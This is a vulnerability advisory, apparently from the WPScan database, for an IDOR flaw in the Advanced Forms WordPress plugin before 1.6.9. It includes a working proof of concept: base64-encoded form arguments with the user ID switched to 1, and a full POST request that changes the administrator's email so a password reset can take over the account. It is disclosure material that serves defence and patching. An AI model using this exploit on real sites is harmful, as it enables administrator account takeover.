WordPress Plugin Vulnerabilities
Advanced Forms < 1.6.9 - Subscriber+ Arbitrary User Email Address Update via IDOR
Description
Insecure Direct Object Reference in edit function of Advanced Forms (Free & Pro) before 1.6.9 allows authenticated remote attacker to change arbitrary user's email address and request for reset password, which could lead to take over of WordPress's administrator account. To exploit this vulnerability, an attacker must register to obtain a valid WordPress's user and use such user to authenticate with WordPress in order to exploit the vulnerable edit function.
Proof of Concept
- Access to target site and login as normal user (userID 209) to use edit user's information function
- After decode data in "af_form_args" and "_acf_form" parameter from base64 format it looks like JSON data
{"display_title":false,"display_description":false,"id":"form_5d37f4523b775","values":[],"submit_text":"Submit","redirect":"https:\/\/victim.com\/","target":"https:\/\/victim.com\/","echo":true,"exclude_fields":[],"uploader":"wp","filter_mode":false,"label_placement":"top","instruction_placement":"label","honeypot":true,"user":209}
this JSON data contain "user" that are Wordpress's userID.
- The doers could change it to another userID (such as 1, by default is WordPress administrator account)
{"display_title":false,"display_description":false,"id":"form_5d37f4523b775","values":[],"submit_text":"Submit","redirect":"https:\/\/victim.com\/","target":"https:\/\/victim.com\/","echo":true,"exclude_fields":[],"uploader":"wp","filter_mode":false,"label_placement":"top","instruction_placement":"label","honeypot":true,"user":1}
- Encode as base64 format and modifying "af_form_args" and "_acf_form" parameter on intercepted proxy before sending it to edit other user's information. In worst case if the target site allows to edit a user's email, the doers could take over user's account by changing email and request for reset password.
POST /account/edit HTTP/1.1
-----------------------------299397949318395902213847433917
Content-Disposition: form-data; name="af_form_args"
eyJkaXNwbGF5X3RpdGxlIjpmYWxzZSwiZGlzcGxheV9kZXNjcmlwdGlvbiI6ZmFsc2UsImlkIjoiZm9ybV81ZDM3ZjQ1MjNiNzc1IiwidmFsdWVzIjpbXSwic3VibWl0X3RleHQiOiJTdWJtaXQiLCJyZWRpcmVjdCI6Imh0dHBzOlwvXC92aWN0aW0uY29tXC8iLCJ0YXJnZXQiOiJodHRwczpcL1wvdmljdGltLmNvbVwvIiwiZWNobyI6dHJ1ZSwiZXhjbHVkZV9maWVsZHMiOltdLCJ1cGxvYWRlciI6IndwIiwiZmlsdGVyX21vZGUiOmZhbHNlLCJsYWJlbF9wbGFjZW1lbnQiOiJ0b3AiLCJpbnN0cnVjdGlvbl9wbGFjZW1lbnQiOiJsYWJlbCIsImhvbmV5cG90Ijp0cnVlLCJ1c2VyIjoxfQ==
-----------------------------299397949318395902213847433917
Content-Disposition: form-data; name="_acf_form"
eyJkaXNwbGF5X3RpdGxlIjpmYWxzZSwiZGlzcGxheV9kZXNjcmlwdGlvbiI6ZmFsc2UsImlkIjoiZm9ybV81ZDM3ZjQ1MjNiNzc1IiwidmFsdWVzIjpbXSwic3VibWl0X3RleHQiOiJTdWJtaXQiLCJyZWRpcmVjdCI6Imh0dHBzOlwvXC92aWN0aW0uY29tXC8iLCJ0YXJnZXQiOiJodHRwczpcL1wvdmljdGltLmNvbVwvIiwiZWNobyI6dHJ1ZSwiZXhjbHVkZV9maWVsZHMiOltdLCJ1cGxvYWRlciI6IndwIiwiZmlsdGVyX21vZGUiOmZhbHNlLCJsYWJlbF9wbGFjZW1lbnQiOiJ0b3AiLCJpbnN0cnVjdGlvbl9wbGFjZW1lbnQiOiJsYWJlbCIsImhvbmV5cG90Ijp0cnVlLCJ1c2VyIjoxfQ==
-----------------------------299397949318395902213847433917
Content-Disposition: form-data; name="acf[field_abcd]" #### for example acf[field_abcd] is for edit email address ####
[email protected]
- When requesting for reset password it will send URL for set new password to [email protected] lead to Wordpress's administrator account takeover
Affects Plugins
Fixed in 1.6.9
Fixed in 1.6.9 References
Classification
Type
IDOR
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Suppawit Punhakit
Submitter
Suppawit Punhakit
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-06-27 (about 3 years ago)
Added
2021-10-21 (about 2 years ago)
Last Updated
2022-04-11 (about 1 years ago)
WPScan 